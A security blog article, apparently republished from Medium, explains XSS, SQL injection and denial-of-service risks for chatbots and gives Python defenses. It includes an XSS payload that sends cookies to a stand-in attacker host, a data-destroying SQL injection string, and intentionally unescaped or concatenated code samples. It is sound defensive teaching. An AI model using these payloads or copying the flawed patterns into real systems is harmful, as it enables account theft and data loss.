Chatbots are here to stay

Chatbots have been around for a long time, and judging by the size of the global chatbot market (and its expected growth), they will stick around and gain importance. In the past they rarely met customer expectations or provided a positive experience. Over the last few years, however, advances in conversational AI have transformed how they can be used. Because chatbots have a wide range of applications, in some cases they also become responsible for collecting and protecting personal information. Consequently, they are an attractive target for hackers and malicious attacks. The responsibility for ensuring chatbot security has become more pronounced since the introduction of the GDPR in Europe. As the statistics suggest that this technology will be a determining factor in our lives, security testing must also become part of our daily tasks, so that chatbots can be used with confidence.

Security Risks, Threats and Vulnerabilities

The words risk, threat and vulnerability are often confused or used interchangeably when reading about computer security, so let’s first clarify the terminology:

- A vulnerability is a weakness in your software (or hardware, or processes, or anything related). In other words, it is a way for hackers to find their way into your systems and exploit them.

- A threat is anything that can exploit a vulnerability to cause loss of, damage to, or destruction of an asset.

- Risk refers to the potential for assets to be lost, damaged, or destroyed: threat + vulnerability = risk!

The well-known OWASP Top 10 is a list of the most critical security risks for web applications. Most chatbots are available through a public web frontend, so all of the OWASP security risks apply to them as well. Two of these risks are especially important to defend against because, in contrast to the others, they are nearly always a serious threat: XSS (Cross-Site Scripting) and SQL Injection.

In addition, AI-enabled chatbots face an increased risk of Denial of Service attacks because of the larger amount of computing resources they require.

Vulnerability 1: XSS — Cross Site Scripting

A typical implementation of a chatbot user interface:

- There is a chat window with an input box

- Everything the user enters in the input box is mirrored in the chat window

- Chatbot response is shown in the chat window

The XSS vulnerability lies in the second step: if the user enters text that includes malicious JavaScript code and the chat window mirrors it unchanged, the attack succeeds as soon as the web browser runs the injected code, for example:

```html
<script>alert(document.cookie)</script>
```
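The following Python sketch illustrates the flawed second step for a chat window whose HTML is rendered on the server. The function name `render_user_message_unsafe` and the markup are hypothetical; what matters is that the user's text is inserted into the HTML without escaping, so the `<script>` payload reaches the browser unchanged.

```python
def render_user_message_unsafe(text: str) -> str:
    """Mirror the user's text into the chat window markup (VULNERABLE).

    Hypothetical helper: the text is inserted verbatim, so any HTML or
    <script> element it contains becomes part of the page.
    """
    return f'<div class="chat-message user">{text}</div>'


payload = "<script>alert(document.cookie)</script>"
html_fragment = render_user_message_unsafe(payload)
print(html_fragment)
# <div class="chat-message user"><script>alert(document.cookie)</script></div>
```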

Possible Attack Vector

To exploit an XSS vulnerability, the attacker has to trick the victim into sending malicious input text:

- The attacker tricks the victim into clicking a hyperlink that points to the chatbot and carries some malicious code

- The malicious code is injected into the website, reads the victim’s cookies and sends them to the attacker without the victim even noticing

- The attacker can use those cookies to get access to the victim’s account on the company website
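A sketch of how such a hyperlink might be built, assuming a hypothetical chatbot page at `chatbot.example` that pre-fills the first chat message from a `q` query parameter and mirrors it unescaped. The domains and the parameter name are placeholders. URL-encoding hides the markup inside the link, but the page decodes it back into the original script.

```python
from urllib.parse import parse_qs, urlencode, urlparse

# Hypothetical chatbot page that pre-fills the first chat message from "q".
CHATBOT_URL = "https://chatbot.example/chat"

# Payload that sends the victim's cookies to a server controlled by the attacker.
payload = (
    "<script>new Image().src='https://attacker.example/steal?c='"
    "+encodeURIComponent(document.cookie)</script>"
)

# The attacker URL-encodes the payload so it fits into an innocent-looking link.
malicious_link = CHATBOT_URL + "?" + urlencode({"q": payload})
print(malicious_link)

# When the victim opens the link, the chatbot page decodes the parameter again.
# If it then mirrors the text unescaped, the browser runs the script.
received = parse_qs(urlparse(malicious_link).query)["q"][0]
print(received == payload)  # True
```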

Defense

This vulnerability is actually easy to defend against by validating and sanitizing user input and escaping it before it is displayed in the chat window, yet we still see it happening over and over again.
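A minimal Python sketch of the defense, using the standard library's `html.escape` to neutralize markup before the text is mirrored into the chat window. The function names and the control-character filter are illustrative assumptions, not a prescribed policy. In a chat window rendered by browser-side JavaScript, the equivalent is to insert the text with `textContent` rather than `innerHTML`.

```python
import html
import re

# Hypothetical validation rule: drop ASCII control characters except tab,
# newline and carriage return.
CONTROL_CHARS = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]")


def sanitize_user_input(text: str) -> str:
    """Remove control characters that have no place in a chat message."""
    return CONTROL_CHARS.sub("", text)


def render_user_message_safe(text: str) -> str:
    """Mirror the user's text into the chat window markup, escaped."""
    # html.escape converts &, <, >, " and ' into HTML entities, so the browser
    # displays the text literally instead of interpreting it as markup.
    return f'<div class="chat-message user">{html.escape(sanitize_user_input(text))}</div>'


safe_fragment = render_user_message_safe("<script>alert(document.cookie)</script>")
print(safe_fragment)
# <div class="chat-message user">&lt;script&gt;alert(document.cookie)&lt;/script&gt;</div>
```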

Vulnerability 2: SQL Injection























A typical implementation of a task-oriented chatbot backend:

- The user tells the chatbot an information item (for example, an order number)

- The chatbot backend queries a data source for this information item

- Based on the result a natural language response is generated and presented to the user

With SQL Injection, the attacker tricks the chatbot backend into treating malicious content as part of the information item:

my order number is “1234; DELETE FROM ORDERS”
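To see why this works, consider a backend that pastes the extracted order number straight into the SQL text. This Python sketch is hypothetical (the `orders` table, the `status` column and the function name are assumptions). Whether the stacked `DELETE` statement actually runs depends on the database driver (Python's `sqlite3` `execute()`, for instance, refuses to run more than one statement at a time), but building queries by string concatenation is the underlying flaw either way.

```python
def build_order_query_unsafe(order_number: str) -> str:
    """Build the lookup query by pasting the extracted entity into the SQL text (VULNERABLE)."""
    return f"SELECT status FROM orders WHERE order_number = {order_number}"


# Entity value as an extractor might return it from the message above.
extracted = "1234; DELETE FROM ORDERS"
query = build_order_query_unsafe(extracted)
print(query)
# SELECT status FROM orders WHERE order_number = 1234; DELETE FROM ORDERS
```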

Possible Chatbot Attack Vector

When attackers have direct access to the chatbot, they can exploit an SQL injection themselves (as in the example above) and run all kinds of SQL (or NoSQL) queries.

Defense



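Developers typically trust their tokenizers and entity extractors to defend against injection attacks. In addition, simple regular-expression checks on user input close this vulnerability in most cases, and passing extracted values to the database as query parameters instead of concatenating them into the SQL text removes the root cause.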
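A minimal sketch of both layers in Python with the built-in `sqlite3` module: a regular-expression check on the extracted entity, followed by a parameterized query so that the value is never interpreted as SQL. The table layout and the assumed order-number format (4 to 10 digits) are hypothetical.

```python
import re
import sqlite3

# Hypothetical format: an order number consists of 4 to 10 ASCII digits.
ORDER_NUMBER_RE = re.compile(r"[0-9]{4,10}")


def lookup_order_status(conn: sqlite3.Connection, order_number: str) -> str:
    # 1. Regular-expression check: reject anything that is not a plain order number.
    if not ORDER_NUMBER_RE.fullmatch(order_number):
        return "Sorry, that doesn't look like a valid order number."
    # 2. Parameterized query: the driver passes the value separately from the
    #    SQL text, so it can never be interpreted as SQL.
    row = conn.execute(
        "SELECT status FROM orders WHERE order_number = ?", (order_number,)
    ).fetchone()
    if row is None:
        return f"I couldn't find order {order_number}."
    return f"Order {order_number} is {row[0]}."


conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE orders (order_number TEXT PRIMARY KEY, status TEXT)")
conn.execute("INSERT INTO orders VALUES ('1234', 'shipped')")

print(lookup_order_status(conn, "1234"))                      # Order 1234 is shipped.
print(lookup_order_status(conn, "1234; DELETE FROM ORDERS"))  # Sorry, that doesn't look like a valid order number.
print(conn.execute("SELECT COUNT(*) FROM orders").fetchone()[0])  # 1
```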

Vulnerability 3: Denial of Service

Artificial intelligence requires high computing power, especially when deep learning is involved, as in state-of-the-art natural language understanding (NLU) algorithms. A Denial of Service (DoS) attack aims to make a resource unavailable for its intended purpose, and it is easy to see why chatbots are more vulnerable to DoS attacks than typical backends built on highly optimized database systems. If a chatbot receives a very large number of requests, it may cease to be available to legitimate users. These attacks cause long response delays, lost requests and service interruptions, with a direct impact on availability.

Possible Chatbot Attack Vector

A typical DoS attack sends a large number of large requests to the chatbot to intentionally exhaust the available resources. Eventually, the computing resources are no longer available to legitimate users.
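One inexpensive countermeasure against large requests is to reject oversized messages before they reach the NLU model. The limit below is a hypothetical value; a suitable one depends on the chatbot's use case.

```python
# Hypothetical upper bound on the length of a single chat message.
MAX_MESSAGE_CHARS = 1000


def accept_message(text: str) -> bool:
    """Return True if the message may be forwarded to the NLU engine.

    Empty or whitespace-only messages and messages above the size limit are
    rejected cheaply, before any expensive model inference happens.
    """
    stripped = text.strip()
    return 0 < len(stripped) <= MAX_MESSAGE_CHARS


print(accept_message("Where is my order?"))  # True
print(accept_message("x" * 100_000))        # False
```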



But there is an additional risk to consider: it is quite common for chatbot developers to use cloud-based services like IBM Watson or Google Dialogflow. Depending on the chosen plan, usage limits or quotas may apply, and these can be exhausted quickly. For example, the Google Dialogflow Essentials free plan limits access to 180 requests per minute; all further requests are denied. On a usage-based plan without any limits, a DoS attack can easily cost a fortune because of the increased number of requests.
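To avoid silently exhausting a quota like this, the backend can count its own calls to the cloud service and answer with a fallback message once the limit is reached. Below is a sliding-window sketch in Python; the class name and the injectable `clock` parameter (used to make it testable) are assumptions, and the defaults simply mirror the 180-requests-per-minute figure above. Note that this caps quota usage and cost; it does not by itself keep the bot available to legitimate users during an attack.

```python
import time
from collections import deque
from typing import Callable


class QuotaGuard:
    """Allow at most `limit` outgoing NLU calls in any sliding `window` of seconds."""

    def __init__(self, limit: int = 180, window: float = 60.0,
                 clock: Callable[[], float] = time.monotonic) -> None:
        self.limit = limit
        self.window = window
        self.clock = clock
        self.sent = deque()  # timestamps of calls that were forwarded

    def try_acquire(self) -> bool:
        now = self.clock()
        # Forget calls that have left the sliding window.
        while self.sent and now - self.sent[0] >= self.window:
            self.sent.popleft()
        if len(self.sent) >= self.limit:
            return False  # over quota: reply with a fallback instead of calling the NLU
        self.sent.append(now)
        return True


# Usage with a fake clock: 200 requests arrive at the same instant.
fake_now = [0.0]
guard = QuotaGuard(clock=lambda: fake_now[0])
allowed = sum(guard.try_acquire() for _ in range(200))
print(allowed)  # 180
fake_now[0] = 60.0  # one minute later the window has emptied again
print(guard.try_acquire())  # True
```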

Defense

The established methods for defending against Denial of Service attacks, such as rate limiting requests per client and capping request sizes, apply to chatbots as well.
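Rate limiting per client is one of these established methods. The sketch below implements a token bucket in Python, keyed by a client identifier such as an IP address or session ID. The class name, the default burst size of 5 messages and the refill rate of 1 message per second are hypothetical choices.

```python
import time
from typing import Callable, Dict, Tuple


class PerClientRateLimiter:
    """Token-bucket rate limiter keyed by client ID.

    Each client may send a burst of `capacity` messages, then `refill_rate`
    messages per second; excess messages are rejected before any NLU call.
    """

    def __init__(self, capacity: float = 5.0, refill_rate: float = 1.0,
                 clock: Callable[[], float] = time.monotonic) -> None:
        self.capacity = capacity
        self.refill_rate = refill_rate
        self.clock = clock
        # client_id -> (tokens left, time of last update)
        self.buckets: Dict[str, Tuple[float, float]] = {}

    def allow(self, client_id: str) -> bool:
        now = self.clock()
        tokens, last = self.buckets.get(client_id, (self.capacity, now))
        # Refill in proportion to the elapsed time, never above capacity.
        tokens = min(self.capacity, tokens + (now - last) * self.refill_rate)
        allowed = tokens >= 1.0
        if allowed:
            tokens -= 1.0
        self.buckets[client_id] = (tokens, now)
        return allowed


fake_now = [0.0]
limiter = PerClientRateLimiter(capacity=5, refill_rate=1, clock=lambda: fake_now[0])
print([limiter.allow("attacker") for _ in range(7)])  # five True, then two False
print(limiter.allow("legit-user"))  # True: other clients keep their own budget
fake_now[0] = 2.0
print(limiter.allow("attacker"))  # True: two tokens were refilled after 2 seconds
```

Each client gets its own budget, so a single flooding client is throttled without affecting others. A production limiter would also evict idle buckets and usually runs in front of the chatbot, for example in a reverse proxy or API gateway.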

Mitigation Strategies

Apart from the defense strategies above, some general rules help mitigate the risk of system breaches.

Software Developer Education

Naturally, the best way to defend against vulnerabilities is to not even let them occur in the first place. Software developers should get special training to consider system security as part of their day-to-day development routine. Establishing the mindset and processes in the development team is the first and most important step.

Continuous Security Testing



Security testing should be part of your continuous testing pipeline. The earlier in the release timeline a security vulnerability is identified and fixed, the cheaper it is.

Basic tests based on the OWASP Top 10 should be done at the API level as well as at the end-to-end level. Typically, defense against SQL injection is best tested at the API level (because of speed), while defense against XSS is best tested at the end-to-end level (because it requires JavaScript execution in a browser).



Specialised tools like Botium help in setting up your continuous security testing pipeline for chatbots.

Conclusion

Chatbots are exposed to the same kinds of vulnerabilities, threats and risks as other customer-facing web applications. Due to the nature of chatbots, some vulnerabilities are more likely than others, but the well-established defense strategies work for chatbots as well.

Top 3 Chatbot Security Vulnerabilities in 2022 was originally published in Chatbots Life on Medium, where people are continuing the conversation by highlighting and responding to this story.